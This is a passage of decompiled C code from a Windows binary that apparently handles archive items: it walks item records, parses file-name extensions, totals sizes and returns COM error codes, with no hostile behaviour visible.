																				E00428A47(_t1785 - 0x4cc);
																				 *(_t1785 - 4) = 5;
																				E00428510(_t1785 - 0x1b4, __eflags);
																				 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																				 *(_t1785 - 4) = 0x16;
																				E0040862D();
																				 *(_t1785 - 4) = 4;
																				E00408604(_t1785 - 0x4c);
																				 *(_t1785 - 4) = 3;
																				L0043353F(_t1785 - 0x2cc, __eflags);
																				__eflags = _t1746;
																				 *(_t1785 - 4) = 1;
																				if(_t1746 != 0) {
																					 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																				}
																				_t1765 =  *(_t1785 + 0x14);
																				goto L285;
																			}
																			_t1249 =  *(_t1785 + 0x20);
																			__eflags = _t1249;
																			if(_t1249 != 0) {
																				 *((intOrPtr*)( *_t1249 + 8))(_t1249);
																				_t420 = _t1785 + 0x20;
																				 *_t420 =  *(_t1785 + 0x20) & 0x00000000;
																				__eflags =  *_t420;
																			}
																			E0040C9B4(_t1785 - 0x2b4,  *((intOrPtr*)(_t1785 - 0x98)));
																			_t1601 =  *((intOrPtr*)(_t1445 + 0x17c));
																			 *(_t1785 - 0x298) =  *( *((intOrPtr*)(_t1445 + 0x48)) + _t1774);
																			_t1254 =  *((intOrPtr*)(_t1445 + 0x190)) + _t1774;
																			 *(_t1785 + 0x14) = _t1254;
																			_t1255 =  *_t1254;
																			_t1730 =  *((intOrPtr*)(_t1601 + _t1255 * 8)) +  *((intOrPtr*)(_t1445 + 0x148));
																			asm("adc eax, [ebx+0x14c]");
																			 *(_t1785 - 0x2a4) = _t1730;
																			 *((intOrPtr*)(_t1785 - 0x2a0)) =  *((intOrPtr*)(_t1601 + 4 + _t1255 * 8));
																			 *((intOrPtr*)(_t1785 - 0x29c)) =  *((intOrPtr*)(_t1445 + 0xc)) +  *( *(_t1785 + 0x14)) * 8;
																			L0040FBD7(_t1785 - 0x2cc);
																			 *(_t1785 + 0x14) =  *( *((intOrPtr*)(_t1785 + 0x10)) + 8);
																			E0042DB56(_t1785 - 0x34c);
																			_push(_t1746);
																			_push( *((intOrPtr*)(_t1785 + 0x10)));
																			 *(_t1785 - 4) = 0x17;
																			_push( *( *((intOrPtr*)(_t1785 + 0xc)) + 0x50));
																			_push(_t1785 - 0x34c);
																			_push(_t1785 - 0x34);
																			_push(0);
																			_push( *(_t1785 - 0x64));
																			_t1268 = L004279E7(_t1785 - 0x4cc, _t1730, __eflags);
																			__eflags = _t1268;
																			 *(_t1785 - 0x18) = _t1268;
																			if(__eflags != 0) {
																				 *(_t1785 - 4) = 0x15;
																				L0042B864(_t1785 - 0x34c, __eflags);
																				 *(_t1785 - 4) = 0x14;
																				E00408604(_t1785 - 0xe8);
																				_t1271 =  *(_t1785 - 0x64);
																				 *(_t1785 - 4) = 0x13;
																				__eflags = _t1271;
																				if(_t1271 != 0) {
																					 *((intOrPtr*)( *_t1271 + 8))(_t1271);
																				}
																				_t1272 =  *(_t1785 + 0x20);
																				 *(_t1785 - 4) = 0x11;
																				__eflags = _t1272;
																				if(_t1272 != 0) {
																					 *((intOrPtr*)( *_t1272 + 8))(_t1272);
																				}
																				 *(_t1785 - 4) = 0xf;
																				L00423D3B(_t1785 - 0x1d4);
																				 *(_t1785 - 4) = 0xe;
																				E00428A47(_t1785 - 0x4cc);
																				 *(_t1785 - 4) = 5;
																				E00428510(_t1785 - 0x1b4, __eflags);
																				 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																				 *(_t1785 - 4) = 0x18;
																				E0040862D();
																				 *(_t1785 - 4) = 4;
																				E00408604(_t1785 - 0x4c);
																				 *(_t1785 - 4) = 3;
																				L0043353F(_t1785 - 0x2cc, __eflags);
																				__eflags = _t1746;
																				 *(_t1785 - 4) = 1;
																				if(_t1746 != 0) {
																					 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																				}
																				_t1765 =  *(_t1785 - 0x18);
																				goto L285;
																			} else {
																				L00467AC0( *((intOrPtr*)(_t1785 - 0x2c4)));
																				__eflags =  *(_t1785 - 0x2b8);
																				if(__eflags != 0) {
																					_t1765 =  *(_t1785 - 0x2b8);
																					 *(_t1785 - 4) = 0x15;
																					L0042B864(_t1785 - 0x34c, __eflags);
																					 *(_t1785 - 4) = 0x14;
																					E00408604(_t1785 - 0xe8);
																					_t1286 =  *(_t1785 - 0x64);
																					 *(_t1785 - 4) = 0x13;
																					__eflags = _t1286;
																					if(_t1286 != 0) {
																						 *((intOrPtr*)( *_t1286 + 8))(_t1286);
																					}
																					_t1287 =  *(_t1785 + 0x20);
																					 *(_t1785 - 4) = 0x11;
																					__eflags = _t1287;
																					if(_t1287 != 0) {
																						 *((intOrPtr*)( *_t1287 + 8))(_t1287);
																					}
																					 *(_t1785 - 4) = 0xf;
																					L00423D3B(_t1785 - 0x1d4);
																					 *(_t1785 - 4) = 0xe;
																					E00428A47(_t1785 - 0x4cc);
																					 *(_t1785 - 4) = 5;
																					E00428510(_t1785 - 0x1b4, __eflags);
																					 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																					 *(_t1785 - 4) = 0x19;
																					E0040862D();
																					 *(_t1785 - 4) = 4;
																					E00408604(_t1785 - 0x4c);
																					goto L255;
																				}
																				_t1627 =  *((intOrPtr*)(_t1785 + 0x10));
																				_t1298 =  *(_t1785 + 0x14);
																				__eflags = _t1298 -  *((intOrPtr*)(_t1627 + 8));
																				if(_t1298 >=  *((intOrPtr*)(_t1627 + 8))) {
																					L154:
																					 *((intOrPtr*)(_t1746 + 0x20)) =  *((intOrPtr*)(_t1746 + 0x20)) + E00429826(_t1785 - 0x34c);
																					_push(_t1785 - 0x34c);
																					_t1301 =  *((intOrPtr*)(_t1785 + 0x10));
																					asm("adc [edi+0x24], edx");
																					_t478 = _t1301 + 0x3c; // 0x3c
																					L0042F063(_t478);
																					 *(_t1785 - 4) = 0x15;
																					L0042B864(_t1785 - 0x34c, __eflags);
																					 *(_t1785 - 4) = 0x14;
																					E00408604(_t1785 - 0xe8);
																					_t1305 =  *(_t1785 - 0x64);
																					 *(_t1785 - 4) = 0x13;
																					__eflags = _t1305;
																					if(_t1305 != 0) {
																						 *((intOrPtr*)( *_t1305 + 8))(_t1305);
																					}
																					_t1306 =  *(_t1785 + 0x20);
																					 *(_t1785 - 4) = 0x11;
																					__eflags = _t1306;
																					if(_t1306 != 0) {
																						 *((intOrPtr*)( *_t1306 + 8))(_t1306);
																					}
																					 *(_t1785 - 4) = 0xf;
																					L00423D3B(_t1785 - 0x1d4);
																					L159:
																					_t494 =  *((intOrPtr*)(_t1785 + 0x10)) + 0x50; // 0x50
																					E00415C6D(_t494,  *((intOrPtr*)( *(_t1785 - 0x38) + 8)));
																					 *(_t1785 + 0x14) =  *(_t1785 + 0x14) & 0x00000000;
																					_t1312 =  *(_t1774 +  *((intOrPtr*)(_t1445 + 0x5c)));
																					_t1775 =  *( *((intOrPtr*)(_t1445 + 0x1a4)) + _t1774);
																					__eflags = _t1312;
																					 *(_t1785 - 0x38) = _t1312;
																					if(_t1312 <= 0) {
																						L167:
																						 *(_t1785 - 0x24) =  *(_t1785 - 0x24) + 1;
																						 *(_t1785 - 0x1c) =  *(_t1785 - 0x1c) + 0xc;
																						__eflags =  *(_t1785 - 0x24) -  *(_t1785 - 0xac);
																						if( *(_t1785 - 0x24) <  *(_t1785 - 0xac)) {
																							_t1212 =  *(_t1785 - 0x1c);
																							continue;
																						}
																						goto L168;
																					} else {
																						goto L160;
																					}
																					do {
																						L160:
																						L0042EAC2(_t1785 - 0x178);
																						 *(_t1785 - 4) = 0x1a;
																						E004308F5(_t1445, _t1775, _t1785 - 0x178, _t1785 - 0x1fc);
																						__eflags =  *((char*)(_t1785 - 0x15c));
																						if( *((char*)(_t1785 - 0x15c)) != 0) {
																							 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 1;
																							_t1321 =  *( *((intOrPtr*)(_t1785 - 0xc8)) + _t1775 * 4);
																							__eflags = _t1321;
																							if(_t1321 >= 0) {
																								_t1322 =  *( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) + _t1321 * 4);
																								 *(_t1785 - 0x18) = _t1322;
																								__eflags =  *((char*)(_t1322 + 0x38));
																								if( *((char*)(_t1322 + 0x38)) == 0) {
																									__eflags =  *((char*)(_t1322 + 0x39));
																									if( *((char*)(_t1322 + 0x39)) != 0) {
																										L0042EAC2(_t1785 - 0x158);
																										_push(_t1785 - 0x1fc);
																										_t1730 = _t1785 - 0x158;
																										 *(_t1785 - 4) = 0x1b;
																										L0043327A( *(_t1785 - 0x18), _t1730);
																										 *(_t1785 - 0x158) =  *((intOrPtr*)(_t1785 - 0x178));
																										 *((intOrPtr*)(_t1785 - 0x154)) =  *((intOrPtr*)(_t1785 - 0x174));
																										 *((intOrPtr*)(_t1785 - 0x14c)) =  *((intOrPtr*)(_t1785 - 0x16c));
																										 *((char*)(_t1785 - 0x13a)) =  *((intOrPtr*)(_t1785 - 0x15a));
																										 *((char*)(_t1785 - 0x13c)) =  *((intOrPtr*)(_t1785 - 0x15c));
																										E00430A06(_t1785 - 0x178, _t1785 - 0x158);
																										 *(_t1785 - 4) = 0x1a;
																										L00407A18( *((intOrPtr*)(_t1785 - 0x148)));
																									}
																									_push(_t1785 - 0x1fc);
																									_push(_t1785 - 0x178);
																									E00430A4F( *((intOrPtr*)(_t1785 + 0x10)));
																								}
																							}
																						}
																						 *(_t1785 - 4) = 0xf;
																						L00407A18( *((intOrPtr*)(_t1785 - 0x168)));
																						_t1775 = _t1775 + 1;
																						__eflags =  *(_t1785 + 0x14) -  *(_t1785 - 0x38);
																					} while ( *(_t1785 + 0x14) <  *(_t1785 - 0x38));
																					goto L167;
																				} else {
																					goto L152;
																				}
																				do {
																					L152:
																					_t1730 =  *( *((intOrPtr*)(_t1627 + 0xc)) + _t1298 * 8);
																					 *((intOrPtr*)(_t1746 + 0x28)) =  *((intOrPtr*)(_t1746 + 0x28)) + _t1730;
																					asm("adc [edi+0x2c], ecx");
																					_t1627 =  *((intOrPtr*)(_t1785 + 0x10));
																					_t1298 = _t1298 + 1;
																					__eflags = _t1298 -  *((intOrPtr*)(_t1627 + 8));
																				} while (_t1298 <  *((intOrPtr*)(_t1627 + 8)));
																				 *(_t1785 + 0x14) = _t1298;
																				goto L154;
																			}
																		}
																		_t1340 = _t1232 << 2;
																		 *(_t1785 + 0x14) = _t1340;
																		while(1) {
																			 *(_t1785 - 0x5c) =  *(_t1785 - 0x5c) & 0x00000000;
																			_t1651 =  *((intOrPtr*)( *((intOrPtr*)(_t1445 + 0x70)) + _t1340));
																			__eflags =  *((char*)(_t1651 + 0x1c));
																			if( *((char*)(_t1651 + 0x1c)) != 0) {
																				 *(_t1785 - 0x20) =  *(_t1785 - 0x20) + 1;
																				_t1343 =  *(_t1340 +  *((intOrPtr*)(_t1785 - 0xc8)));
																				__eflags = _t1343;
																				if(_t1343 >= 0) {
																					_t1344 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) + _t1343 * 4));
																					__eflags =  *((char*)(_t1344 + 0x38));
																					if( *((char*)(_t1344 + 0x38)) == 0) {
																						 *(_t1785 - 0x5c) = 1;
																					}
																				}
																			}
																			L0043AC2F(_t1785 - 0xe8,  *(_t1785 - 0x5c));
																			 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 4;
																			__eflags =  *(_t1785 - 0x20) -  *(_t1785 - 0x18);
																			if( *(_t1785 - 0x20) >=  *(_t1785 - 0x18)) {
																				goto L146;
																			}
																			_t1340 =  *(_t1785 + 0x14);
																		}
																		goto L146;
																	}
																	_t1345 = E00429872(_t1445, _t1215);
																	_t1657 =  *((intOrPtr*)(_t1445 + 0x17c));
																	 *((intOrPtr*)(_t1785 - 0x104)) = _t1345;
																	_push(_t1746);
																	_push(_t1733);
																	_push(_t1345);
																	 *((intOrPtr*)(_t1785 - 0x100)) = _t1733;
																	_t1347 =  *( *((intOrPtr*)(_t1445 + 0x190)) + _t1774);
																	asm("adc eax, [ebx+0x14c]");
																	_push( *((intOrPtr*)(_t1657 + 4 + _t1347 * 8)));
																	_push( *((intOrPtr*)(_t1657 + _t1347 * 8)) +  *((intOrPtr*)(_t1445 + 0x148)));
																	_t1730 =  *( *((intOrPtr*)(_t1785 + 0xc)) + 0x50);
																	_t1350 = L00432A5E( *((intOrPtr*)(_t1785 - 0x98)), _t1730);
																	__eflags = _t1350;
																	 *(_t1785 + 0x14) = _t1350;
																	if(_t1350 != 0) {
																		 *(_t1785 - 4) = 0xe;
																		E00428A47(_t1785 - 0x4cc);
																		 *(_t1785 - 4) = 5;
																		E00428510(_t1785 - 0x1b4, __eflags);
																		 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																		 *(_t1785 - 4) = 0x10;
																		E0040862D();
																		 *(_t1785 - 4) = 4;
																		E00408604(_t1785 - 0x4c);
																		 *(_t1785 - 4) = 3;
																		L0043353F(_t1785 - 0x2cc, __eflags);
																		__eflags = _t1746;
																		 *(_t1785 - 4) = 1;
																		if(_t1746 != 0) {
																			 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																		}
																		 *(_t1785 - 4) =  *(_t1785 - 4) & 0x00000000;
																		E00408604(_t1785 - 0xb4);
																		 *(_t1785 - 4) =  *(_t1785 - 4) | 0xffffffff;
																		E00408604(_t1785 - 0xd4);
																		_t1076 =  *(_t1785 + 0x14);
																		goto L286;
																	}
																	 *((intOrPtr*)(_t1746 + 0x18)) =  *((intOrPtr*)(_t1746 + 0x18)) +  *((intOrPtr*)(_t1785 - 0x104));
																	asm("adc [edi+0x1c], eax");
																	 *(_t1785 - 0x20) =  *(_t1785 - 0x20) & 0x00000000;
																	_t1363 =  *( *((intOrPtr*)(_t1445 + 0x48)) + _t1774);
																	_t1667 =  *( *((intOrPtr*)(_t1445 + 0x190)) + _t1774);
																	 *(_t1785 - 0x18) = _t1363;
																	__eflags =  *(_t1363 + 0x30);
																	if( *(_t1363 + 0x30) <= 0) {
																		L136:
																		_t1364 =  *((intOrPtr*)(_t1785 + 0x10));
																		_push( *(_t1785 - 0x18));
																		_t366 = _t1364 + 0x3c; // 0x3c
																		L0042F063(_t366);
																		goto L159;
																	}
																	_t1367 = _t1667 << 3;
																	__eflags = _t1367;
																	 *(_t1785 + 0x14) = _t1367;
																	do {
																		L0042389F( *((intOrPtr*)(_t1785 + 0x10)),  *((intOrPtr*)( *(_t1785 + 0x14) +  *((intOrPtr*)(_t1445 + 0xc)))),  *((intOrPtr*)( *(_t1785 + 0x14) +  *((intOrPtr*)(_t1445 + 0xc)) + 4)));
																		 *(_t1785 - 0x20) =  *(_t1785 - 0x20) + 1;
																		_t1371 =  *(_t1785 - 0x18);
																		 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 8;
																		__eflags =  *(_t1785 - 0x20) -  *((intOrPtr*)(_t1371 + 0x30));
																	} while ( *(_t1785 - 0x20) <  *((intOrPtr*)(_t1371 + 0x30)));
																	goto L136;
																}
																goto L168;
															}
															L225:
															 *(_t1785 - 4) = 0xe;
															E00428A47(_t1785 - 0x4cc);
															 *(_t1785 - 4) = 5;
															E00428510(_t1785 - 0x1b4, __eflags);
															 *(_t1785 - 0x2c) =  *(_t1785 - 0x2c) + 1;
															__eflags =  *(_t1785 - 0x2c) - 4;
														} while ( *(_t1785 - 0x2c) < 4);
														__eflags =  *(_t1785 - 0x24) -  *(_t1785 - 0xac);
														if( *(_t1785 - 0x24) ==  *(_t1785 - 0xac)) {
															 *(_t1785 - 0x7c) = 4;
															 *((intOrPtr*)(_t1785 - 0x88)) = 0;
															 *(_t1785 - 0x84) = 0;
															 *((intOrPtr*)(_t1785 - 0x80)) = 0;
															 *((intOrPtr*)(_t1785 - 0x8c)) = 0x47a668;
															_t1764 =  *((intOrPtr*)(_t1785 + 8));
															 *(_t1785 - 4) = 0x27;
															 *(_t1785 - 0x10) = 0;
															__eflags =  *(_t1764 + 8);
															if( *(_t1764 + 8) <= 0) {
																L277:
																E00419600(_t1785 - 0x8c, _t1730, 0x432d40, _t1764);
																 *(_t1785 - 0x10) =  *(_t1785 - 0x10) & 0x00000000;
																__eflags =  *(_t1785 - 0x84);
																if( *(_t1785 - 0x84) <= 0) {
																	L282:
																	 *(_t1785 - 4) = 5;
																	E00408604(_t1785 - 0x8c);
																	L004329D2( *((intOrPtr*)(_t1785 + 0x10)));
																	 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																	 *(_t1785 - 4) = 0x29;
																	E0040862D();
																	 *(_t1785 - 4) = 4;
																	E00408604(_t1785 - 0x4c);
																	 *(_t1785 - 4) = 3;
																	L0043353F(_t1785 - 0x2cc, __eflags);
																	__eflags = _t1746;
																	 *(_t1785 - 4) = 1;
																	if(_t1746 != 0) {
																		 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																	}
																	_t1765 = 0;
																	__eflags = 0;
																	goto L285;
																} else {
																	goto L278;
																}
																do {
																	L278:
																	_t1767 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) +  *( *((intOrPtr*)(_t1785 - 0x80)) +  *(_t1785 - 0x10) * 4) * 4));
																	L0042EAC2(_t1785 - 0x158);
																	__eflags =  *((char*)(_t1767 + 0x39));
																	 *(_t1785 - 4) = 0x28;
																	_push(_t1785 - 0x1fc);
																	if( *((char*)(_t1767 + 0x39)) == 0) {
																		_push(_t1785 - 0x158);
																		_push( *_t1767);
																		E004308F5(_t1445);
																	} else {
																		L0043327A(_t1767, _t1785 - 0x158);
																	}
																	_push(_t1785 - 0x1fc);
																	_push(_t1785 - 0x158);
																	E00430A4F( *((intOrPtr*)(_t1785 + 0x10)));
																	 *(_t1785 - 4) = 0x27;
																	L00407A18( *((intOrPtr*)(_t1785 - 0x148)));
																	 *(_t1785 - 0x10) =  *(_t1785 - 0x10) + 1;
																	__eflags =  *(_t1785 - 0x10) -  *(_t1785 - 0x84);
																} while ( *(_t1785 - 0x10) <  *(_t1785 - 0x84));
																goto L282;
															} else {
																goto L268;
															}
															do {
																L268:
																_t1092 =  *( *((intOrPtr*)(_t1764 + 0xc)) +  *(_t1785 - 0x10) * 4);
																__eflags = _t1092[0xe];
																if(_t1092[0xe] == 0) {
																	_t1093 =  *_t1092;
																	__eflags = _t1093 - 0xffffffff;
																	if(_t1093 == 0xffffffff) {
																		L275:
																		E00415C6D(_t1785 - 0x8c,  *(_t1785 - 0x10));
																		goto L276;
																	}
																	__eflags =  *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t1445 + 0x70)) + _t1093 * 4)) + 0x1c));
																	L274:
																	if(__eflags != 0) {
																		goto L276;
																	}
																	goto L275;
																}
																__eflags = _t1092[0xe];
																if(_t1092[0xe] != 0) {
																	goto L275;
																}
																__eflags = _t1092[0xe];
																if(__eflags != 0) {
																	goto L275;
																}
																goto L274;
																L276:
																 *(_t1785 - 0x10) =  *(_t1785 - 0x10) + 1;
																__eflags =  *(_t1785 - 0x10) -  *(_t1764 + 8);
															} while ( *(_t1785 - 0x10) <  *(_t1764 + 8));
															goto L277;
														}
														 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
														 *(_t1785 - 4) = 0x26;
														E0040862D();
														 *(_t1785 - 4) = 4;
														E00408604(_t1785 - 0x4c);
														 *(_t1785 - 4) = 3;
														L0043353F(_t1785 - 0x2cc, __eflags);
														__eflags = _t1746;
														 *(_t1785 - 4) = 1;
														if(_t1746 != 0) {
															 *((intOrPtr*)( *_t1746 + 8))(_t1746);
														}
														_t1765 = 0x80004005;
														goto L285;
													}
													 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
													 *(_t1785 - 4) = 0xd;
													E0040862D();
													 *(_t1785 - 4) = 4;
													E00408604(_t1785 - 0x4c);
													 *(_t1785 - 4) = 3;
													L0043353F(_t1785 - 0x2cc, __eflags);
													__eflags = _t1746;
													 *(_t1785 - 4) = 1;
													if(_t1746 != 0) {
														 *((intOrPtr*)( *_t1746 + 8))(_t1746);
													}
													_t1765 =  *(_t1785 + 0x14);
													goto L285;
												}
												 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
												 *(_t1785 - 4) = 0xc;
												E0040862D();
												 *(_t1785 - 4) = 4;
												E00408604(_t1785 - 0x4c);
												 *(_t1785 - 4) = 3;
												L0043353F(_t1785 - 0x2cc, __eflags);
												__eflags = _t1746;
												 *(_t1785 - 4) = 1;
												if(_t1746 != 0) {
													 *((intOrPtr*)( *_t1746 + 8))(_t1746);
												}
												_t1765 =  *(_t1785 + 0x14);
												goto L285;
											}
											_push(0x14);
											_t1776 = L004079F2();
											 *(_t1785 - 0x5c) = _t1776;
											__eflags = _t1776;
											 *(_t1785 - 4) = 8;
											if(_t1776 == 0) {
												_t1776 = 0;
												__eflags = 0;
											} else {
												 *_t1776 = 0x47a78c;
												 *(_t1776 + 4) =  *(_t1776 + 4) & 0x00000000;
												_t221 = _t1776 + 8; // 0x8
												L0040351A(_t221);
												 *_t1776 = 0x47b404;
											}
											 *(_t1785 - 4) = 5;
											 *(_t1785 - 0xa0) = _t1776;
											E0040C9B4(_t1785 - 0x294, _t1776);
											_t1391 =  *((intOrPtr*)( *((intOrPtr*)(_t1785 + 0x1c))));
											__eflags =  *((char*)(_t1391 + 0x2c));
											if( *((char*)(_t1391 + 0x2c)) == 0) {
												_t1392 =  *(_t1785 + 0x20);
												__eflags = _t1392;
												if(_t1392 != 0) {
													 *(_t1785 + 0x20) =  *(_t1785 + 0x20) & 0x00000000;
													_t1730 = _t1785 + 0x20;
													 *(_t1785 - 4) = 0xa;
													_t1393 =  *((intOrPtr*)( *_t1392 + 0xc))(_t1392, _t1730);
													__eflags = _t1393;
													_push( *(_t1785 + 0x20));
													 *(_t1785 - 0x5c) = _t1393;
													if(_t1393 == 0) {
														_t255 = _t1776 + 8; // 0x8
														L00403593(_t255);
														 *(_t1785 - 4) = 5;
														__imp__#6( *(_t1785 + 0x20));
														goto L109;
													}
													__imp__#6();
													 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
													 *(_t1785 - 4) = 0xb;
													E0040862D();
													 *(_t1785 - 4) = 4;
													E00408604(_t1785 - 0x4c);
													 *(_t1785 - 4) = 3;
													L0043353F(_t1785 - 0x2cc, __eflags);
													__eflags = _t1746;
													 *(_t1785 - 4) = 1;
													if(_t1746 != 0) {
														 *((intOrPtr*)( *_t1746 + 8))(_t1746);
													}
													_t1765 =  *(_t1785 - 0x5c);
													goto L285;
												}
												 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
												 *(_t1785 - 4) = 9;
												E0040862D();
												 *(_t1785 - 4) = 4;
												E00408604(_t1785 - 0x4c);
												 *(_t1785 - 4) = 3;
												L0043353F(_t1785 - 0x2cc, __eflags);
												__eflags = _t1746;
												 *(_t1785 - 4) = 1;
												if(_t1746 != 0) {
													 *((intOrPtr*)( *_t1746 + 8))(_t1746);
												}
												_t1765 = 0x80004001;
												goto L285;
											} else {
												_t227 = _t1776 + 8; // 0x8
												E00401E26(_t227, _t1391 + 0x30);
												goto L109;
											}
										} else {
											goto L78;
										}
										do {
											L78:
											_t1730 =  *(_t1785 - 0x10);
											_t1409 =  *((intOrPtr*)( *((intOrPtr*)(_t1459 + 0xc)) + _t1730 * 4));
											__eflags =  *((char*)(_t1409 + 0x38));
											if( *((char*)(_t1409 + 0x38)) == 0) {
												goto L93;
											}
											__eflags =  *((char*)(_t1409 + 0x3b));
											if( *((char*)(_t1409 + 0x3b)) != 0) {
												goto L93;
											}
											__eflags =  *((char*)(_t1409 + 0x3a));
											if( *((char*)(_t1409 + 0x3a)) != 0) {
												goto L93;
											}
											_t1730 =  *(_t1409 + 0x20) |  *(_t1409 + 0x24);
											__eflags = _t1730;
											if(_t1730 == 0) {
												goto L93;
											}
											 *(_t1785 - 0x25) =  *(_t1785 - 0x25) & 0x00000000;
											__eflags =  *(_t1785 - 0x11);
											if( *(_t1785 - 0x11) == 0) {
												L92:
												_t1730 =  *(_t1785 - 0x25) & 0x000000ff;
												E00415C6D( *((intOrPtr*)( *((intOrPtr*)(_t1785 - 0x40)) + L0043352C( *((intOrPtr*)(_t1760 + 0x2c)), _t1730) * 4)),  *(_t1785 - 0x10));
												_t1459 =  *((intOrPtr*)(_t1785 + 8));
												goto L93;
											}
											_t1694 = _t1409 + 0x28;
											_t1414 =  *(_t1409 + 0x2c);
											__eflags = _t1414;
											if(_t1414 == 0) {
												goto L92;
											}
											_t1738 =  *_t1694;
											_t1415 = _t1738 + _t1414 * 2 - 2;
											while(1) {
												__eflags =  *_t1415 - 0x2e;
												if( *_t1415 == 0x2e) {
													break;
												}
												__eflags = _t1415 - _t1738;
												if(_t1415 == _t1738) {
													_t1417 = _t1415 | 0xffffffff;
													__eflags = _t1417;
													L90:
													__eflags = _t1417;
													if(_t1417 >= 0) {
														__eflags = _t1417 + 1;
														_t1420 = L004072C9(_t1694, _t1785 - 0x84, _t1417 + 1);
														 *(_t1785 - 4) = 7;
														 *(_t1785 - 0x25) = L00432FD7(_t1420);
														 *(_t1785 - 4) = 5;
														L00407A18( *(_t1785 - 0x84));
													}
													goto L92;
												}
												_t1415 = _t1415;
											}
											_t1417 = _t1415 - _t1738 >> 1;
											goto L90;
											L93:
											 *(_t1785 - 0x10) =  *(_t1785 - 0x10) + 1;
											__eflags =  *(_t1785 - 0x10) -  *(_t1459 + 8);
										} while ( *(_t1785 - 0x10) <  *(_t1459 + 8));
										goto L94;
									}
									__eflags =  *(_t1760 + 0x1c);
									if( *(_t1760 + 0x1c) == 0) {
										goto L77;
									}
									goto L76;
								} else {
									_t1765 = L0040FB53(_t1785 - 0x2cc);
									__eflags = _t1765;
									if(__eflags != 0) {
										L255:
										 *(_t1785 - 4) = 3;
										L0043353F(_t1785 - 0x2cc, __eflags);
										__eflags = _t1746;
										 *(_t1785 - 4) = 1;
										if(_t1746 != 0) {
											 *((intOrPtr*)( *_t1746 + 8))(_t1746);
										}
										goto L285;
									}
									goto L72;
								}
							} else {
								_t1765 = _t1040;
								L285:
								 *(_t1785 - 4) =  *(_t1785 - 4) & 0x00000000;
								E00408604(_t1785 - 0xb4);
								 *(_t1785 - 4) =  *(_t1785 - 4) | 0xffffffff;
								E00408604(_t1785 - 0xd4);
								_t1076 = _t1765;
								L286:
								 *[fs:0x0] =  *((intOrPtr*)(_t1785 - 0xc));
								return _t1076;
							}
						}
						_t1777 =  *((intOrPtr*)(_t1757 + 0xc));
						do {
							_t1428 =  *_t1777;
							if( *((char*)(_t1428 + 0x38)) == 0) {
								goto L54;
							}
							_t1701 =  *(_t1428 + 0x20);
							_t1429 =  *(_t1428 + 0x24);
							 *(_t1785 - 0x54) =  *(_t1785 - 0x54) + _t1701;
							asm("adc [ebp-0x50], eax");
							if( *(_t1785 - 0x70) != 1 ||  *(_t1785 - 0x6c) != 0) {
								 *(_t1785 - 0x34) =  *(_t1785 - 0x34) + _t1701;
								asm("adc [ebp-0x30], eax");
								goto L53;
							} else {
								__eflags = _t1429 -  *(_t1785 - 0x30);
								if(__eflags < 0) {
									L53:
									_t1745 = 0;
									goto L54;
								}
								if(__eflags > 0) {
									L52:
									 *(_t1785 - 0x34) = _t1701;
									 *(_t1785 - 0x30) = _t1429;
									goto L53;
								}
								__eflags = _t1701 -  *(_t1785 - 0x34);
								if(_t1701 <=  *(_t1785 - 0x34)) {
									goto L53;
								}
								goto L52;
							}
							L54:
							 *(_t1785 - 0x10) =  *(_t1785 - 0x10) + 1;
							_t1777 = _t1777 + 4;
						} while ( *(_t1785 - 0x10) < _t1730);
						goto L55;
					}
					E0040867E(_t1785 - 0xd4,  *((intOrPtr*)(_t1445 + 0x6c)));
					_t1751 = 0;
					if( *((intOrPtr*)(_t1445 + 0x6c)) <= 0) {
						L12:
						_t1739 = 0;
						_t1431 = 0;
						if( *(_t1757 + 8) <= 0) {
							L16:
							 *(_t1785 - 0x1c) = _t1739;
							if( *((intOrPtr*)(_t1445 + 0x44)) <= _t1739) {
								L42:
								L00433628(_t1785 - 0xb4, _t1739, 0x432b98, _t1445);
								_t1757 =  *((intOrPtr*)(_t1785 + 8));
								_t1745 = 0;
								goto L43;
							} else {
								goto L17;
							}
							do {
								L17:
								_t1434 =  *(_t1785 - 0x1c) << 2;
								_t1739 =  *(_t1434 +  *((intOrPtr*)(_t1445 + 0x5c)));
								 *(_t1785 - 0x2c) = 0;
								_t1706 =  *( *((intOrPtr*)(_t1445 + 0x1a4)) + _t1434);
								 *(_t1785 - 0x24) = 0;
								 *(_t1785 - 0x18) = _t1739;
								 *(_t1785 - 0x60) = 0;
								 *(_t1785 - 0x5c) = 0;
								if(_t1739 > 0) {
									_t1779 =  *((intOrPtr*)(_t1785 - 0xc8));
									_t1740 = _t1779 + _t1706 * 4;
									_t1708 =  *((intOrPtr*)(_t1445 + 0x70)) - _t1779;
									 *(_t1785 - 0x68) = _t1708;
									goto L20;
									L24:
									_t1740 =  &(_t1740[1]);
									if( *(_t1785 - 0x2c) <  *(_t1785 - 0x18)) {
										_t1708 =  *(_t1785 - 0x68);
										L20:
										_t1709 =  *((intOrPtr*)(_t1740 + _t1708));
										if( *((char*)(_t1709 + 0x1c)) != 0) {
											_t1780 =  *_t1740;
											 *(_t1785 - 0x2c) =  *(_t1785 - 0x2c) + 1;
											if(_t1780 >= 0 &&  *((char*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) + _t1780 * 4)) + 0x38)) == 0) {
												 *(_t1785 - 0x24) =  *(_t1785 - 0x24) + 1;
												 *(_t1785 - 0x60) =  *(_t1785 - 0x60) +  *_t1709;
